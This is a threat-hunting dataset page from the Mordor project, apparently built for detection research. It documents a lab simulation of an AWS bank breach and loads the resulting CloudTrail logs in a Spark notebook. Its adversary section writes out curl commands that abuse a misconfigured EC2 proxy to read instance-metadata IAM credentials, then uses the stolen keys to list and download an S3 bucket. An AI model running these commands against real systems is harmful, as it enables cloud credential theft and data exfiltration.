AWS Cloud Bank Breach S3¶

Metadata¶


Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/09/13
Modification Date	2020/09/13
Tactics	[‘TA0001’, ‘TA0003’, ‘TA0004’, ‘TA0005’, ‘TA0009’]
Techniques	[‘T1078.004’, ‘T1530’]
Tags	[‘EC2 Proxy Abuse’, ‘S3 Data Exfiltration’]

Dataset Description¶

This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.

Datasets Downloads¶

Dataset Type	Link
cloud	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aws/collection/ec2_proxy_s3_exfiltration.zip

Notebooks¶

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link

Simulation Plan¶

Environment	Tool Type	Module
https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3	Cloud Formation Templates	Exfiltration

Adversary View¶

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"                                            
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0                                                                                                                                                              >

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
"Code" : "Success",
"LastUpdated" : "2020-09-14T00:49:26Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
"Token" : "TOKEN",
"Expiration" : "2020-09-14T07:10:27Z"
}

> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json

> echo aws_session_token = "TOKEN" >> ~/.aws/credentials 

> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic                                   
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt

Explore Mordor Dataset¶

Initialize Analytics Engine¶

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File¶

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aws/collection/ec2_proxy_s3_exfiltration.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data¶

df = spark.sql(
'''
SELECT *
FROM mordorTable
'''
)
df.show(1, vertical=True)

-RECORD 0-----------------------------------
 @timestamp          | 2020-09-13 20:44:23  
 @version            | 1                    
 additionalEventData | null                 
 apiVersion          | null                 
 awsRegion           | us-east-1            
 eventCategory       | null                 
 eventID             | fd4f1042-c7f6-410... 
 eventName           | DescribeInstanceT... 
 eventSource         | ec2.amazonaws.com    
 eventType           | AwsApiCall           
 eventVersion        | 1.05                 
 managementEvent     | null                 
 readOnly            | null                 
 recipientAccountId  | 123456789123         
 requestID           | 2db6a7b5-876c-499... 
 requestParameters   | [,, [100, AAIAAUC... 
 resources           | null                 
 responseElements    | null                 
 sharedEventID       | null                 
 sourceIPAddress     | 1.2.3.4              
 userAgent           | console.ec2.amazo... 
 userIdentity        | [ASIA5FLZVX4OI4ZD... 
only showing top 1 row

Persistence Privilage Escalation